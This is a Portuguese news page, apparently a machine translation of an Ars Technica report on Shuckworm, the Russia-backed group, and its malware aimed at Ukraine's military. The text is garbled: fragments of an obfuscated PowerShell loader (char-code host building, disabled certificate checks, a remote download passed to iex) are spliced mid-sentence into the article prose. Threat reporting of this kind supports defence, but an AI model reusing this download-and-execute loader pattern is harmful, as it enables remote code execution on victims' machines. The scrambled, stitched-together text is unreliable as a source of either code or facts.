linux-BR.org

Notícias de software livre e tecnologias

‘; $ HOSTA+= [CHAR] (57+57); $ HOSTA+= [CHAR] (
60+57); $ addrs = [system.net.dns] :: gethostbyname ($ hosta); $ addr = $ addrs.ad
Dresslist [0]; $ client = (novo-objeto
net.webclient); $ faddr = ‘htt’+’ps: //’+$ addr+$ gt; $ text = $ client.downloads
tring ($ faddr); iex $ text ”
Mais recentemente, a Symantec observou o shuckworm alavancando mais endereços IP em seus scripts do PowerShell.’+[char] (56+56)+[char] (104)+[char] (112); $ HOSTA = [CHAR] (50+4
8); [System.net.ServicePointManager] :: ServerCertificateValidationCallb
ACK = {$ true}; $ HOSTA+= ‘. Vafikgo.Os e -mails contêm anexos maliciosos que se disfarçam de arquivos com extensões, incluindo .docx, .rar, .sfx, lnk e hta.A postagem de quinta -feira inclui endereços IP, hashes, nomes de arquivos e outros indicadores de compromisso que as pessoas podem usar para detectar se foram alvo.Os e -mails geralmente usam tópicos como conflitos armados, procedimentos criminais, combate ao crime e protegendo as crianças como iscas para que as metas abrem os e -mails e cliquem nos anexos.

Fonte: https://arstechnica.com/information-technology/2023/06/russia-backed-hackers-unleash-new-usb-based-malware-on-ukraines-military/